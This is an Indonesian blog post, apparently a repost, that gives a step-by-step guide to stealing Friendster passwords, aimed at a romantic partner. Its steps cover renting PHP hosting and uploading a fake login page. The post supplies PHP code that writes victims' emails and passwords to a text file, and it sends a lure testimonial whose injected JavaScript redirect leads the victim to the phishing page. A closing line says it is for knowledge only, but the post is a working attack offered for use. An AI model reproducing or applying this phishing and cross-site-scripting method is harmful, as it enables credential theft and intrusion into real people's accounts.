“Nge – Hack Friendster, boo’ !”

Standar

Snip'rhackers

Setelah mencari ide artikel apa yang harus dimasukkan kedalam blog saya, akhirnya saya memutuskan untuk mencari artikel tentang cara meng-hacking password Friendster.

Penerapan Social Engineering untuk mendapatkan password di Friendster.
Artikel ini ditujukan bahwa ” Hacking tidak selamanya menggunakan TOOLS “.

Artikel ini diperuntukkan bagi anda yang tertarik, cinta, dan haus ilmu dari Social Engineering…Akhir-akhir ini banyak sih yg membicarakannya, bahkan sekarang sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimana yang telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe banget kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita dan  laen sebagainya.

So langsung saja kita menuju acara puncak nya…

Pertama-tama yg mesti kudu kita siapin :

1. Teh manis penghangat malam plus rokok.
2. Jangan Lupa cemilan yg bikin Kenyang…Nasi Goreng!
3. Web Hosting yg support PHP. Cari di paman Google, banyak kok !
4. Upload file index.htm (ada di source – jasakom.com).

5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>

Dan upload file diatas ke http://www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

hai sayang .. gimana kabarna, kangen nie ..

nah .. Setelah sang pacar penerima testi dan membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, tanpa dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh, si pengirim testi menawarkan jasanya untuk sang pacar tercinta..

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

~ *Hacking tidak selamanya menggunakan ” TOOLS “
~ *Kelemahan XSS merupakan bahaya besar
~ *Teknik ini semata-mata hanya untuk pengetahuan, dan bilamana disalahgunakan resiko ditanggung “penumpang” !

**Thanks To :

~ ***Allah SWT ~

~ *$Jasakom Community ~  Repost by !

Iklan

7 thoughts on ““Nge – Hack Friendster, boo’ !”

Tinggalin balasan ente ya gan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s